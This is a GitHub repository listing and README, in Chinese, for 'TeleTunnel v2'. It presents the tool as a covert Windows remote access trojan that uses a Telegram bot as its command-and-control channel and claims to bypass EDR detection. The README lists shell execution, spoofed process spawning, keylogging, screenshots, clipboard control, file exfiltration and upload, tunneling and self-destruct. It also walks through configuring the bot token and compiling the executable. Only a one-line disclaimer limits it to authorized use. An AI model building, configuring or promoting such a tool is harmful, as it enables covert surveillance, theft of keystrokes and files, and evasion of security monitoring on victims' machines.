mhdgning131/teletunnel
GitHub: mhdgning131/teletunnel
一款基于 Telegram Bot 的 Windows 隐蔽远程访问工具,利用 Telegram 作为 C2 通道实现绕过 EDR 检测的远程控制。
Stars: 34 | Forks: 4
# TeleTunnel v2
一款基于 Telegram 的 Windows 远程访问工具。
**免责声明:仅限在您拥有的系统上进行授权使用!请 🙇**
## 功能特性
- 通过 Telegram 机器人进行远程管理。
- 安全控制(仅接受来自您指定 Telegram 用户 ID 的命令)。
该机器人具有以下功能:
```
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 Identity: USER@HOSTNAME
🛠 ʀᴇᴄᴏɴɴᴀɪssᴀɴᴄᴇ
├── sysinfo - Full system report
├── ss - Desktop capture
├── ps - Process listing
└── ls - Directory browser
⚡️ ᴄᴏᴍᴍᴀɴᴅ ᴄᴇɴᴛᴇʀ
├── > - Native shell
├── spawn - Spoofed exec
├── clip get/set - Clipboard manager
└── kill - Self-destruct
💾 ғɪʟᴇ ᴏᴘᴇʀᴀᴛɪᴏɴs
├── get - Download from host
├── [Drag/Drop]- Upload to host
└── drops - List uploads ($1, $LAST)
⌨️ ᴋᴇʏʟᴏɢɢᴇʀ
└── keylog
📡 ᴛᴜɴɴᴇʟɪɴɢ
└── open|send|close|streams
────────────────────
```
## 前置条件
- Windows 环境。
- 支持 C++17 的编译器(例如 MinGW)。
- 项目包含 `nlohmann/json.hpp` 用于 JSON 解析。该文件已包含在仓库中,省去了您搜寻的麻烦。
## 设置说明
1. **获取 Telegram Bot Token:**
- 在 Telegram 上向 `@BotFather` 发送消息并创建一个新机器人。
- 复制 HTTP API Token。
2. **获取您的 Telegram Chat ID:**
- 向 `@userinfobot` 发送消息以获取您的确切用户 ID。
- 或者,向您的机器人发送一条消息,然后访问 `https://api.telegram.org/bot/getUpdates`,在 `chat` 下找到 `id`。
3. **配置项目:**
- 打开 `config.h`。
- 将 `"YOUR BOT TOKEN HERE"` 替换为您实际的机器人 token。
- 将 `"XXXXXXXXXX"` 替换为您个人的 Telegram 用户 ID。
## 编译
请确保您拥有所需的 Windows 库:`wininet`、`ws2_32`、`gdiplus`、`ole32` 和 `iphlpapi`。
**使用 GCC/MinGW:**
```
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++
```
标签:C++, C2 框架, C2 通信, EDR 绕过, HTTPS, HTTP工具, IP 地址批量处理, JSON, MinGW, RAT, Shell模拟, Telegram Bot, 中高交互蜜罐, 剪切板管理, 命令执行, 开源安全工具, 恶意软件开发, 截图监控, 数据擦除, 文件传输, 端点可见性, 系统侦察, 系统信息收集, 网络信息收集, 网络安全, 网络安全审计, 远程控制, 远程访问木马, 逆向工程平台, 键盘记录, 隐私保护, 隐蔽后门, 隧道工具